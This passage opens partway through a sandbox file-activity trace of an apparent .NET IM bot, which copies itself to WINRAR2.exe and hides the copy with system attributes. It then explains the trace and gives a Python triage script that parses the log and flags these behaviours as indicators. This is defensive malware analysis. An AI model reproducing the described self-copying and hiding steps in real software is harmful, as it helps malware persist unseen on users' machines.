Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\WINRAR2.exe
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe.config (OPEN_EXISTING)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
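The trace above is the whole install sequence in one read: the dropper c:\images000123jpg.exe writes CIMBOT.EXE, then IMBOT.EXE, deletes the CIMBOT.EXE staging copy, checks the Zone.Identifier stream (mark-of-the-web) on IMBOT.EXE, pulls in the .NET 2.0 runtime (mscorwks.dll under v2.0.50727, so this is a managed bot), opens \Device\Tcp for its socket, copies itself to WINRAR2.exe and marks that copy Hidden+ReadOnly+System. The script below is an added example, not output from the sandbox or code from the bot's author: a small Python triage pass that parses this "Op: path (mode)" log format and pulls those behaviours out as indicators, so the same check can be run over any trace in this format. The sample lines are excerpted from the trace above and embedded as constructed test input; the line format is assumed to be exactly as shown on the page.

```python
import re

# Constructed test input: lines excerpted from the "Chronological Order"
# trace above, in the same "Op: path (mode)" / "Op: path Flags: (...)" format.
SAMPLE_LOG = r"""
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
"""

# "Operation: rest" - the operation name is letters, spaces and '/' only.
LINE_RE = re.compile(r"^(?P<op>[A-Za-z/ ]+?): (?P<rest>.*)$")
COPY_RE = re.compile(r"^(?P<src>.+?) to (?P<dst>.+)$")
FLAGS_RE = re.compile(r"^(?P<path>.+?) Flags: \((?P<flags>[^)]*)\)$")
PATH_MODE_RE = re.compile(r"^(?P<path>.+?)(?: \((?P<mode>[A-Z_]*)\))?$")
CLR_RE = re.compile(r"microsoft\.net\\framework\\(v[\d.]+)\\mscorwks\.dll$")


def parse_line(line):
    """Split one trace line into {op, path, ...}; None for blank/unknown lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    op, rest = m.group("op"), m.group("rest")
    rec = {"op": op}
    if op == "Copy File":
        c = COPY_RE.match(rest)
        rec["path"], rec["dst"] = c.group("src"), c.group("dst")
    elif op in ("Set File Attributes", "Get File Attributes"):
        f = FLAGS_RE.match(rest)
        rec["path"] = f.group("path")
        rec["flags"] = set(f.group("flags").split())
    else:
        p = PATH_MODE_RE.match(rest)
        rec["path"], rec["mode"] = p.group("path"), p.group("mode")
    return rec


def triage(log_text):
    """Walk the trace in order and collect the install behaviours seen above."""
    findings = {
        "dropped_executables": [],   # .exe files created by the sample
        "self_copies": [],           # (src, dst) of Copy File operations
        "hidden_system_files": [],   # files given HIDDEN+SYSTEM attributes
        "self_deletes": [],          # deletion of a file the sample created
        "motw_checks": [],           # reads of the Zone.Identifier stream
        "clr_versions": [],          # .NET runtime directories probed
        "network_device_opens": [],  # \Device\... opens (socket setup)
    }
    created = set()  # lower-cased paths the sample itself wrote
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        op, path = rec["op"], rec["path"]
        lower = path.lower()
        if op in ("Create File", "Create/Open File") and lower.endswith(".exe"):
            findings["dropped_executables"].append(path)
            created.add(lower)
        elif op == "Copy File":
            findings["self_copies"].append((path, rec["dst"]))
            created.add(rec["dst"].lower())
        elif op == "Set File Attributes" and \
                {"FILE_ATTRIBUTE_HIDDEN", "FILE_ATTRIBUTE_SYSTEM"} <= rec["flags"]:
            findings["hidden_system_files"].append(path)
        elif op == "Delete File" and lower in created:
            findings["self_deletes"].append(path)
        elif op == "Get File Attributes" and lower.endswith(":zone.identifier"):
            findings["motw_checks"].append(path)
        elif op == "Find File" and CLR_RE.search(lower):
            findings["clr_versions"].append(CLR_RE.search(lower).group(1))
        elif op == "Create/Open File" and lower.startswith("\\device\\"):
            findings["network_device_opens"].append(path)
    return findings


def indicators(findings):
    """Turn the collected facts into the short list an analyst would report."""
    hits = []
    if findings["self_copies"]:
        hits.append("copies itself under a new name")
    if findings["hidden_system_files"]:
        hits.append("hides its copy with HIDDEN+SYSTEM attributes")
    if findings["self_deletes"]:
        hits.append("deletes its own staging file")
    if findings["motw_checks"]:
        hits.append("inspects Zone.Identifier (mark-of-the-web) on its dropper")
    if findings["clr_versions"]:
        hits.append("managed (.NET) executable, CLR " + ", ".join(findings["clr_versions"]))
    if findings["network_device_opens"]:
        hits.append("opens \\Device\\Tcp (network socket setup)")
    return hits


if __name__ == "__main__":
    for hit in indicators(triage(SAMPLE_LOG)):
        print("-", hit)
```

The parser keys on the three line shapes that appear in the trace (plain path with an optional mode in parentheses, "Flags: (...)" for attribute calls, and "src to dst" for copies); the ordering matters for the self-delete check, which only fires when the deleted path was written earlier in the same trace.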